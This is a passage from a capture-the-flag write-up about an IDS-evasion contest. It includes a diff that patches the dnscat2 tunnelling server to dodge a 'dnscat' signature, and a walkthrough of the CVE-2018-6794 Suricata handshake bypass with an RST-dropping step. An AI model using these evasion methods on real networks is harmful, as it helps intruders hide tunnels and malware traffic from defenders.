The IDS signature is triggered by the string "dnscat" in the traffic from our server; this much is clear from the message. Obfuscating or encrypting the traffic won't help.

But a look at the client code shows that the checks are not strict: the response need not contain the "dnscat" string at all! We only need to remove the string from the server code, or else replace it on the fly with the help of NetSED. Swapping it out on the fly is much easier, but here is the patch for the server code just in case:

diff -r dnscat2/server/libs/dnser.rb dnscat2_bypass/server/libs/dnser.rb
<           segments << unpack("a#{len}")
>           segments << [unpack("a#{len}")[0].upcase]

<         name.split(/\./).each do |segment|
>         name.upcase.split(/\./).each do |segment|

diff -r dnscat2/server/tunnel_drivers/driver_dns.rb dnscat2_bypass/server/tunnel_drivers/driver_dns.rb
<         response = (response == "" ? "dnscat" : ("dnscat." + response))
>         response = (response == "" ? "dnsCat" : ("dnsCat." + response))

Five participants met the challenge.

100.64.0.14 – POST

No participants collected the flag for this task.


We see the now-familiar form for entering an IP address, inviting us to participate in testing new malware. One of its new tricks is bypassing the IDS in some unknown way. To get the flag, all you need to do is send the HTTP header "Server: ng1nx" in response. And the fun begins.

As expected, we get a GET request at our IP address and send a response, which gets blocked by the IDS.

[Drop] [**] [1:5002:1] 'ng1nx' Server header found. Malware shall not pass [**]

Here's the hint given to participants:
Sometimes, tasks that look hard are the simplest. If nothing seems vulnerable, maybe you're missing something right under your nose?

That "something right under your nose" is the IDS. On the detections page, you can see that we're dealing with an unprotected Suricata IDS.


Search for "Suricata IDS Bypass" and the very first link you get points to CVE-2018-6794. This vulnerability allows you to bypass packet checks if the normal TCP handshake process is interrupted and the data is sent before the process is completed. It looks like this:

Client    ->  [SYN] [Seq=0 Ack=0]           ->  Evil Server   # 1/2
Client    <-  [SYN, ACK] [Seq=0 Ack=1]      <-  Evil Server   # 2/2
Client    <-  [PSH, ACK] [Seq=1 Ack=1]      <-  Evil Server   # Data here
Client    <-  [FIN, ACK] [Seq=83 Ack=1]     <-  Evil Server
Client    ->  [ACK] [Seq=1 Ack=84]          ->  Evil Server   # 3/2
Client    ->  [PSH, ACK] [Seq=1 Ack=84]     ->  Evil Server

You download the exploit, change the string to "ng1nx", disable the kernel's reset (RST) packets (for example, with an iptables rule dropping outgoing RSTs), and run it.

As mentioned, nobody was able to get this flag, though a few participants were very close.

Conclusion

49 people signed up for the contest, and 12 of them collected at least one flag. Part of the excitement came from the fact that tasks could have multiple solutions, especially the ones involving SMB and DCERPC. Perhaps you have a few ideas of your own?

Winners:

  • 1st place: @psih1337
  • 2nd place: @webr0ck
  • 3rd place: @empty_jack


Signature trigger statistics:



Thank you all for participating! Next year we'll have even more tasks of all levels of difficulty.

Author: Kirill Shipulin, Positive Technologies
